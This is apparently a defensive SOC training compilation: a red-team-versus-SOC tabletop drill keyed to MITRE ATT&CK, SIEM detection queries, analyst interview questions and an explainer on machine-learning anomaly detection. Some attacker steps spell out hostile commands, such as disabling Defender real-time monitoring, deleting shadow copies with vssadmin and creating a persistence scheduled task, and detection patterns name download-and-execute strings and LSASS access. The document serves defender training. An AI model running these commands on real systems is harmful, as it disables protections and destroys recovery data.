Step-by-Step Red Team vs SOC interactive drill

 Format per step: Attacker Action → Your Move (respond) → Example SOC Play

1) Initial Access — Spearphishing Attachment (TA0001 • T1566.001)

Attacker action: Finance user opens Q3_Report.xlsm, enables macros. Macro drops a loader and reaches out to [C2_DOMAIN].

Artifacts to expect:

• Mail gateway alert on macro doc; attachment hash [HASH].

• Security 4688: EXCEL.EXE → powershell.exe.

• PowerShell 4104/4103: suspicious download/IEX strings.

• Sysmon 1/3: powershell.exe spawned + outbound to [C2_IP]:443.

Your move: What do you triage first, and what do you block/contain?

Example SOC play (peek after you reply):

• Quarantine the email campaign; block [HASH], [C2_DOMAIN], [C2_IP].

• Isolate endpoint [HOST-A].

• Pull mailbox from Finance user + same campaign recipients.

• Start timeline on [HOST-A] (proc tree around 4688/4104/Sysmon 1).

• Create SIEM rule: EXCEL.EXE → powershell.exe with network.

---

2) Execution — PowerShell (TA0002 • T1059.001 / User Execution T1204.002)

Attacker action: Loader runs obfuscated PowerShell to stage an in-memory beacon.

Artifacts:

• PS 4104: base64/obf content; AMSI hits (if enabled).

• Sysmon 3: unusual connections from powershell.exe.

• EDR: LOLBins + AMSI bypass attempts.

Your move: What queries do you run, what do you capture (memory/disk), and how do you verify in-memory execution?

Example SOC play:

• Block PS with network if policy allows; kill offending process.

• Memory capture of [HOST-A] (EDR live response) to confirm injected module.

• SIEM hunt: Image=*\\powershell.exe AND (CommandLine=*FromBase64* OR *IEX* OR *DownloadString*).

---

3) Persistence — Run Keys / Scheduled Task (TA0003 • T1547.001 / T1053.005)

Attacker action: Adds HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater → [path]\beacon.exe and/or creates schtasks /create /sc minute /tn Updater.

Artifacts:

• Sysmon 13: Registry value set.

• Security 4698: Scheduled task created.

• Autoruns delta shows new entry.

 Your move: How do you enumerate + remove persistence safely?

Example SOC play:

• Export autoruns/registry keys; remove entries post-snapshot.

• Disable and delete suspicious scheduled tasks.

• Add detection: alert on new Run keys + 4698 unknown task names.

---

4) Privilege Escalation — Exploit/Token Abuse (TA0004 • T1068 / T1134.001)

Attacker action: Attempts SYSTEM via vulnerable service/driver or token impersonation on [HOST-A].

Artifacts:

• Security 4672: Special privileges.

• Sysmon 1: low-priv → high-priv proc chain (e.g., cmd.exe as SYSTEM).

• EDR exploit/tamper alerts.

 Your move: What indicators confirm elevation, and what containment/escalation do you perform?

Example SOC play:

• Snapshot access tokens/process owners; block exploit tool hash.

• Isolate host if not already; push hotfixes/EDR hardening policy.

• Hunt for SeDebugPrivilege processes from non-system parents.

---

5) Defense Evasion — Disable Security Tools / Obfuscation (TA0005 • T1562.001 / T1027)

Attacker action: Tries Set-MpPreference -DisableRealtimeMonitoring $true and drops packed binaries.

Artifacts:

• Microsoft Defender 5007 config change logs.

• EDR tamper protection alerts.

• New packed binaries with low reputation.

 Your move: What immediate protections do you re-enable and how do you harden?

Example SOC play:

• Force re-enable AV/EDR, rotate tamper protection password (if applicable).

• Block powershell.exe child procs for standard users temporarily.

• Add SIEM alert: Defender setting changes + non-admin callers.

---

6) Credential Access — LSASS Dump (TA0006 • T1003.001)

Attacker action: Attempts to read LSASS memory from a tool on [HOST-A].

Artifacts:

• Sysmon 10: lsass.exe access from non-system process.

• EDR: Credential theft heuristic.

• Security 4688: rundll32, procdump, suspicious signed binaries.

 Your move: What forensics do you grab, and how do you protect accounts?

Example SOC play:

• Kill offending proc; block tool hashes/signers.

• Reset passwords + revoke tokens for logged-on users on [HOST-A].

• Detections: alert on Sysmon 10 to lsass.exe excluding known AV paths.

---

7) Discovery — AD & Network Recon (TA0007 • T1087/T1018/T1046)

Attacker action: Runs whoami /all, nltest /dclist, net group "Domain Admins" /domain, network scans.

Artifacts:

• Security 4688: cmd.exe, net.exe, nltest.exe, dsquery.exe.

• Lateral enumeration spikes in Windows event/network telemetry.

 Your move: How do you distinguish benign admin activity vs recon, and what do you scope?

Example SOC play:

• Baseline admin tool usage; flag tool use from non-admin workstations.

• Correlate enumeration → subsequent auth attempts to servers.

• Suppress noise; raise on sequences (whoami→nltest→net group).

---

8) Lateral Movement — SMB Admin Shares / PsExec (TA0008 • T1021.002)

Attacker action: Uses stolen creds to push service over \\[TARGET]\ADMIN$, or PsExec to [SERVER-1].

Artifacts:

• Security 4624 (Type 3) from [HOST-A] to [SERVER-1] with uncommon account.

• Service creation 7045 / PsExec service artifacts.

• Sysmon 3: SMB bursts; Sysmon 1: psexesvc.exe.

 Your move: What blocks do you place and how do you trace blast radius?

Example SOC play:

• Disable account used; block host-to-host SMB temporarily where feasible.

• Isolate [SERVER-1]; pull service creation/event logs.

• Hunt for same creds against other servers (pivot map).

---

9) Command & Control — HTTPS Beacon (TA0011 • T1071.001)

Attacker action: Beacon over HTTPS with jitter/SNI to [C2_DOMAIN] (fronted).

Artifacts:

• Proxy/TLS: unusual JA3/JA3S, rare SNI, short periodic beacons.

• DNS: rare domain, high NXDOMAIN siblings, newly registered domain.

• EDR: long-lived process with periodic network.

 Your move: How do you detect/contain C2 without burning all evidence?

Example SOC play:

• Block destination at DNS/Proxy; sinkhole if available.

• Capture PCAP before/after block; tag affected assets.

• Retro hunt: same SNI/JA3 across fleet; add rare-domain model.

---

10) Collection & Exfiltration — Archive & Upload (TA0009/TA0010 • T1560.001 / T1567.002)

Attacker action: Stages 7z a C:\Users\[USER]\AppData\Local\Temp\docs.7z → uploads to C2/cloud.

Artifacts:

• Security 4688: 7z.exe / tar.exe create archive in temp paths.

• DLP/proxy: large POST/PUT to rare external host.

• File creation spikes of .zip/.7z in user profile.

 Your move: What do you block and how do you prove what left?

Example SOC play:

• Block outbound to [C2_DOMAIN] and cloud storage destination.

• Grab proxy/DLP logs; compare bytes sent vs staged archive size.

• Contain user account; collect the staging dir for evidence.

---

11) Impact — Ransomware Prep/Execution (TA0040 • T1486)

Attacker action: Drops encryptor; shadow copy deletion; mass file writes.

Artifacts:

• vssadmin delete shadows /all /quiet (4688).

• EDR: high file rename/write rate; ransom note creation per directory.

• SMB: unusual write storms to file shares.

 Your move: What pre-encryption controls and last-mile containment do you apply?

Example SOC play:

• Preemptive: block vssadmin/wbadmin abuse; enable canary files & rate-limit share writes.

• Immediate: isolate infected machines; disable affected AD accounts.

• Restore from offline backups; forensics on initial vector; exec briefing.

---

Quick-use Detection Snippets (adapt to your SIEM)

• Splunk – PS suspicious:

  index=win* (EventCode=4104 OR EventCode=4688)
  (Image="*\\powershell.exe" OR ScriptBlockText="*FromBase64*" OR CommandLine="*IEX*")
  | stats count by host, user, CommandLine
  

• Elastic – LSASS access (Sysmon 10):

  event.code:10 and process.pe.original_file_name:lsass.exe and not process.executable:("C:\\Program Files\\Windows Defender\\*" "C:\\Program Files\\*.exe")
  

• Windows service creation:

  EventCode=7045 OR (EventCode=4697) | stats count by ServiceName, ServiceFileName, ComputerName
  

SOC Interview Questions

1. What is a SOC (Security Operations Center)?

 A centralized team and facility that monitors, detects, analyzes, and responds to cybersecurity incidents in real time.

---

2. What are the primary responsibilities of a SOC?

• Continuous monitoring of network and systems

• Incident detection, triage, and response

• Threat intelligence analysis

• Log management & SIEM tuning

• Vulnerability assessment coordination

• Incident reporting and documentation

---

3. What is the difference between Tier 1, Tier 2, and Tier 3 SOC analysts?

• Tier 1 (Monitoring/Alert Handling): Monitor SIEM alerts, escalate suspicious activity.

• Tier 2 (Incident Response): Investigate escalations, analyze logs, confirm incidents, contain threats.

• Tier 3 (Threat Hunting/Forensics): Deep investigation, malware analysis, proactive threat hunting.

---

4. What is SIEM and why is it important in SOC?

 SIEM (Security Information & Event Management) collects, correlates, and analyzes logs from different sources to detect threats and generate alerts.
Examples: Splunk, QRadar, Elastic SIEM, ArcSight.

---

5. What is the difference between an Event, Alert, and Incident?

• Event → Any log or activity observed in the system.

• Alert → Notification generated when an event matches suspicious patterns.

• Incident → A confirmed security event that violates policy or indicates compromise.

---

6. How do you handle a false positive in SOC?

 Verify against threat intelligence, logs, and baselines. If confirmed false, tune SIEM rules/signatures to reduce noise.

---

7. What are Indicators of Compromise (IOCs) and Indicators of Attack (IOAs)?

• IOCs → Evidence of compromise (malicious IPs, hashes, domains).

• IOAs → Behavioral indicators showing intent of an attack (privilege escalation attempts, abnormal lateral movement).

---

8. What are the common log sources in a SOC?

• Firewalls

• IDS/IPS

• Antivirus/EDR

• Proxy/Web servers

• Authentication systems (Active Directory)

• Cloud services logs (AWS CloudTrail, Azure Security logs)

---

9. What is Threat Hunting and how is it different from Incident Response?

• Threat Hunting → Proactive search for hidden threats before alerts trigger.

• Incident Response → Reactive steps taken after an incident is detected.

---

10. What is a Playbook in SOC?

 A documented set of steps (manual or automated) to respond to specific incidents like phishing, malware infection, or brute-force attacks.

---

11. What are common SOC tools?

• SIEM → Splunk, QRadar, Elastic SIEM

• EDR/XDR → CrowdStrike, SentinelOne, Microsoft Defender

• SOAR → Cortex XSOAR, Splunk Phantom

• Threat Intel → MISP, Recorded Future

• Packet Analysis → Wireshark, Zeek

---

12. How would you respond to a suspected phishing email reported by a user?

 Steps:

1. Instruct user not to click/open.

2. Analyze email headers, URLs, and attachments.

3. Search if other users received similar emails.

4. Quarantine email in mail server.

5. Block malicious domains/IPs.

6. Update detection rules & train users.

---

13. How do you detect lateral movement in a network?

 Look for:

• Unusual authentication attempts

• Multiple login failures

• Access to uncommon servers

• Use of tools like PsExec, RDP, SMB connections

---

14. What is the MITRE ATT&CK framework and why is it useful in SOC?

 MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs). SOC uses it to map detections, analyze threats, and build defenses.

---

15. What metrics/KPIs are important for SOC performance?

• MTTD (Mean Time to Detect)

• MTTR (Mean Time to Respond)

• % of false positives

• Number of incidents detected & resolved

• Incident severity trends

---

Quick Tip for Interviews:
When answering scenario questions, always use the Incident Response Lifecycle:

1. Identify

2. Contain

3. Eradicate

4. Recover

5. Lessons Learned

1. What is a Security Operations Center (SOC)?

A Security Operations Center (SOC) is a centralized unit within an organization that is responsible for continuously monitoring, detecting, analyzing, and responding to cybersecurity threats and incidents. Its main goal is to protect the organization's information assets from cyberattacks.

2. What is the role of a SOC Analyst?

A SOC Analyst's primary role is to act as the first line of defense. They are responsible for:

• Monitoring security systems and tools (like SIEMs, IDS/IPS).

• Analyzing security alerts to differentiate between real threats and false positives.

• Investigating potential security incidents.

• Following established incident response procedures.

• Creating and maintaining documentation for security incidents.

3. Explain the difference between a threat, a vulnerability, and a risk.

• A threat is a potential cause of an incident that could harm an organization's systems or data. It's the "who" or "what" that could cause damage (e.g., a hacker, malware, or a natural disaster).

• A vulnerability is a weakness in a system or an asset that a threat can exploit. It's the "how" an attack can happen (e.g., an unpatched software, a weak password, or a misconfigured firewall).

• A risk is the potential for loss or damage when a threat exploits a vulnerability. It's the impact of the attack, usually measured in terms of likelihood and potential business impact. Risk = Threat x Vulnerability.

Technical and Tool-Based Questions

4. What is a SIEM and why is it important in a SOC?

SIEM stands for Security Information and Event Management. It is a security tool that centralizes and aggregates security data from various sources (like firewalls, servers, and endpoint devices). A SIEM is crucial because it helps SOC analysts by:

• Providing a single pane of glass for monitoring.

• Correlating log data to identify patterns that might indicate an attack.

• Generating alerts for suspicious activity, which analysts can then investigate.

5. What is the difference between an IDS and an IPS?

• IDS (Intrusion Detection System): A passive system that monitors network traffic for malicious activity and policy violations. When it finds something suspicious, it generates an alert. It does not block the traffic.

• IPS (Intrusion Prevention System): An active, inline system that not only detects malicious activity but also takes action to block or prevent the attack in real-time.

6. How do you handle a false positive?

A false positive is a security alert generated by a tool for activity that is actually benign. My process would be:

1. Analyze the Alert: Review the alert details to understand what triggered it (e.g., source IP, destination port, protocol).

2. Verify the Activity: Use other tools (like log aggregators, network traffic analyzers, or endpoint protection) to confirm if the activity is legitimate.

3. Document and Tune: If confirmed as a false positive, I would document the finding, explain why it was a false positive, and then work with the SIEM/tool administrator to tune the rules or add an exception to prevent it from triggering again.

Incident Response and Scenario Questions

7. Walk me through your process for investigating a phishing alert.

1. Initial Triage: I would immediately review the alert details, including the sender's email address, subject line, and any attached files or links.

2. User Contact: I would contact the user who reported the email to get more context and ensure they didn't click on any links or download attachments.

3. Threat Analysis: I would analyze the email headers to check the sender's authenticity and trace its origin. I would then check the links and attachments in a secure sandboxed environment to see what they do.

4. IOC Search: I would extract any Indicators of Compromise (IOCs), such as malicious URLs, file hashes, or IP addresses, and search our SIEM and endpoint logs for any other users who may have received or interacted with the same email.

5. Containment and Eradication: If any user clicked the link or downloaded a file, I would work with the IT team to isolate the affected machine and remove the threat.

6. Reporting: Finally, I would create an incident report detailing the findings, the steps taken, and recommendations to prevent a similar incident in the future.

8. What is an IOC (Indicator of Compromise)?

An IOC is a piece of forensic data, such as a log entry or a file hash, that identifies malicious activity on a system or network. It's essentially the "digital breadcrumbs" left behind by an attacker. Common examples include:

• Malicious IP addresses or domains.

• File hashes (MD5, SHA-256).

• Unusual outbound network traffic.

• Specific email subject lines or sender addresses.

9. What steps would you take if a critical server is reported as compromised?

This is a high-priority incident requiring a structured response:

1. Verify and Validate: I would first confirm that the alert is legitimate and that the server is indeed compromised, using real-time monitoring and log analysis.

2. Containment: The most critical step is to isolate the compromised server from the rest of the network to prevent the attack from spreading. This might involve unplugging the network cable or blocking its access via a firewall.

3. Investigation and Eradication: Once contained, I would begin a detailed forensic investigation to understand how the compromise occurred. I would then work to remove the threat, such as wiping the system and restoring from a known clean backup.

4. Recovery: I would restore the server and services to their operational state, ensuring that the vulnerability that led to the compromise is patched.

5. Reporting: I would document the entire incident from start to finish for future reference and for a post-mortem analysis.

How machine learning is used in Network Anomaly Detection?

---

What is Network Anomaly Detection?

It means spotting unusual or suspicious behavior in network traffic (like hackers, malware, or system failures) compared to what’s normally expected.

Example: If your network usually sees 100 logins per day, and suddenly there are 1,000 failed logins at midnight, that’s an anomaly 

---

How Machine Learning Helps

Machine learning models are trained on network data (like traffic logs, packet details, user behavior) to learn what “normal” looks like. Then they can detect when something unusual happens.

---

 1. Supervised Learning (learns from labeled data)

• Training data: “Normal” vs. “Attack” traffic labeled by experts.

• Model learns patterns of each.

• Example: Detecting DDoS attacks, port scans, or phishing traffic.

 Real-world: IDS/IPS systems (like Snort + ML add-ons).

---

 2. Unsupervised Learning (no labels, finds patterns)

• Model learns what normal traffic looks like.

• Anything that doesn’t fit → flagged as anomaly.

• Example: Detecting unusual spikes in bandwidth, unknown protocols, or new malware behavior.

 Real-world: Detecting zero-day attacks (new threats not seen before).

---

 3. Reinforcement Learning (trial & error with feedback)

• System gets feedback on whether alerts are correct.

• Over time, it improves decisions (reduces false positives).

• Example: Adaptive firewalls that learn which traffic to block or allow.

 Real-world: Self-learning network security tools (like AI-driven intrusion prevention).

---

 Examples of Anomalies ML Detects

• Unusual login patterns (multiple failed logins = brute-force attack).

• Data exfiltration (sudden large file transfers outside network).

• Malware traffic (strange connections to rare IPs).

• Lateral movement (user account accessing servers it never used before).

---

In short:
Machine learning helps network anomaly detection by:

1. Learning what normal traffic looks like.

2. Spotting unusual patterns that may indicate threats.

3. Reducing false alarms by continuously adapting.

---

Machine learning is a powerful tool for network anomaly detection because it can learn the normal patterns of network traffic and then flag any activity that deviates from that baseline as a potential threat.¹ Instead of relying on predefined rules that can quickly become outdated, machine learning models can adapt to evolving network behaviors and identify new, unknown threats.²

---

How It Works: The General Process

The process of using machine learning for network anomaly detection generally follows these steps:

1. Data Collection: The first step is to gather vast amounts of data from the network.³ This includes things like log files, firewall data, packet information (headers and payload), and data on network flow.

2. Feature Extraction: Raw network data is too complex for a machine learning model to use directly. So, useful features are extracted from the data. These features could include things like IP addresses, port numbers, the frequency of connections, and the size of data packets.⁴

3. Training the Model: The machine learning model is then trained on this data. It learns what "normal" network activity looks like.⁵ The specific approach depends on the type of machine learning used:

   • Supervised Learning: In this approach, the model is trained on a dataset that is labeled with examples of both "normal" and "anomalous" traffic.⁶ This is highly effective but requires a lot of labeled data, which can be hard to come by.

   • Unsupervised Learning: This is the more common approach. The model is given a large amount of unlabeled network data and learns the patterns of normal behavior on its own.⁷ It then flags any data points that don't fit into these normal patterns.⁸

   • Reinforcement Learning: This is a newer approach where the model is treated as an "agent" that is rewarded for correctly identifying threats and penalized for making mistakes.⁹ It learns and improves over time through trial and error.

4. Anomaly Detection: Once the model is trained, it can be deployed to monitor the network in real-time. When new network traffic comes in, the model analyzes it and assigns it an "anomaly score."¹⁰ If the score is above a certain threshold, it is flagged as a potential threat and an alert is sent to a security analyst.¹¹

---

What Kinds of Anomalies Can Be Detected? 

Machine learning can help detect a wide range of network anomalies, including:

• Cyberattacks: This includes things like DDoS (Distributed Denial of Service) attacks, where a server is flooded with traffic, as well as malware, ransomware, and phishing attempts.

• Insider Threats: It can identify unusual behavior from within the network, such as an employee trying to access sensitive data they don't normally use.¹²

• Network Malfunctions: It can also detect non-malicious anomalies like a failing network device or a misconfigured server.

• Zero-Day Exploits: Because machine learning looks for deviations from the norm, it can often detect new, previously unknown attacks that traditional signature-based systems would miss.¹³

In short, machine learning provides a more dynamic and intelligent way to protect networks by learning from data to identify and respond to threats in real-time.¹⁴